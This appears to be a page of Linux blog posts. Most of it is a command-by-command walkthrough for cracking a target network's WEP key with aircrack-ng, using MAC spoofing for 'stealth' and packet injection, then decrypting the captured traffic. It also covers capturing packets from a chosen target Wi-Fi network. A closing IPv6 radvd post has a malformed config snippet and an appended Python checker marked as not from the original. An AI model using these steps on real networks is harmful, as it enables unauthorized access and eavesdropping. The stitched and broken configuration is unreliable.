Mar 19
Tom | Linux General, Networking, Wireless
Using Debian Wheezy (testing) with an Intel Corporation Centrino Wireless-N 1000 card…
- Stop network manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID, SSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
- Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
- aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
- aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
- When this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
- After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
- The WEP key should then be displayed in the terminal window.
- The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
- Exit monitor mode: airmon-ng stop mon0
Mar 17
Tom | Linux General, Networking, Wireless
This is easier and more effective than packet sniffing on a wired network:
- Stop Network Manager: /etc/init.d/network-manager stop
- Set your WiFi card into monitoring mode: airmon-ng start wlan0
- See what’s around: airodump-ng mon0
- Select a target network, and note the BSSID value and channel (used as ‘-c’ option below)
- Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
- Examine packet trace: wireshark output-file.cap
(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)
Mar 17
Tom | Linux General, Networking, Wireless
Very simple way to test if your WiFi card supports injection:
Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmon-ng start wlan0
Test using: aireplay-ng -9 mon0
With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!
I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000
Mar 17
Tom | Linux General, Networking, Wireless
After discovering that Aircrack-ng isn’t currently included in Debian Wheezy (but it is in both Stable and Sid), I grabbed the latest version out of SVN (v1.1 – r2128) and built the package for my x86-64 system.
Source and compiled executables are available here.
I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to /usr/local/sbin/ – so they will be easy to remove when the aircrack-ng package becomes available in Wheezy.
Feb 20
Tom | IPv6, Linux System Administration, Networking
DNS client configuration can be handled by the standard Router Advertisement Daemon (radvd) – apt-get install radvd
Edit /etc/radvd.conf on your Linux Router and insert the following at the end of the file to use Google’s DNS Caching server:
# radvd expects RDNSS definitions inside an interface { ... } block
RDNSS 2001:4860:4860::8888
{
};
On your Linux clients, install rdnssd to automatically add the advertised IPv6 DNS servers to your /etc/resolv.conf.
The /etc/resolv.conf now contains both IPv4 and IPv6 entries. Typically a DHCP client adds the IPv4 DNS server entries; this can be prevented by removing ‘domain-name-servers’ from the ‘request’ line in dhclient.conf.
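A client-side check on what the router actually advertises, as an added example (not code from the original post): it parses the RDNSS option (type 25, RFC 8106) out of the options portion of a Router Advertisement and reports resolvers that are not on an allowlist. The sample bytes are constructed, and the function names and the 2001:db8::53 address are assumptions.

```python
import ipaddress
import struct

RDNSS_OPTION = 25  # RFC 8106 Recursive DNS Server option

def parse_rdnss(options: bytes):
    """Return [(lifetime_seconds, IPv6Address), ...] from the options part of an RA."""
    found, offset = [], 0
    while offset + 2 <= len(options):
        opt_type, opt_len = options[offset], options[offset + 1]
        size = opt_len * 8  # the length field counts 8-octet units
        if opt_len == 0 or offset + size > len(options):
            raise ValueError("malformed ND option at offset %d" % offset)
        if opt_type == RDNSS_OPTION:
            # 8-byte header plus one or more 16-byte addresses: odd length >= 3
            if opt_len < 3 or opt_len % 2 == 0:
                raise ValueError("bad RDNSS option length %d" % opt_len)
            (lifetime,) = struct.unpack_from("!I", options, offset + 4)
            for pos in range(offset + 8, offset + size, 16):
                found.append((lifetime, ipaddress.IPv6Address(options[pos:pos + 16])))
        offset += size
    return found

def unexpected_resolvers(options: bytes, allowed):
    """Resolvers advertised with a non-zero lifetime that are not on the allowlist."""
    allowed = {ipaddress.IPv6Address(a) for a in allowed}
    return [addr for lifetime, addr in parse_rdnss(options)
            if lifetime and addr not in allowed]

def build_rdnss(lifetime, *servers):
    """Construct an RDNSS option (sample data only)."""
    body = b"".join(ipaddress.IPv6Address(s).packed for s in servers)
    return struct.pack("!BBHI", RDNSS_OPTION, 1 + 2 * len(servers), 0, lifetime) + body

# Constructed sample: an MTU option (type 5) followed by two RDNSS options.
MTU_OPT = struct.pack("!BBHI", 5, 1, 0, 1500)
SAMPLE = (MTU_OPT
          + build_rdnss(600, "2001:4860:4860::8888")
          + build_rdnss(600, "2001:db8::53"))  # documentation prefix, assumed stray resolver
ALLOWED = ["2001:4860:4860::8888"]  # the resolver configured in radvd.conf above

if __name__ == "__main__":
    for lifetime, addr in parse_rdnss(SAMPLE):
        print(addr, lifetime)
    print("unexpected:", unexpected_resolvers(SAMPLE, ALLOWED))
```

A lifetime of 0 tells clients to stop using a resolver, so such entries are not reported.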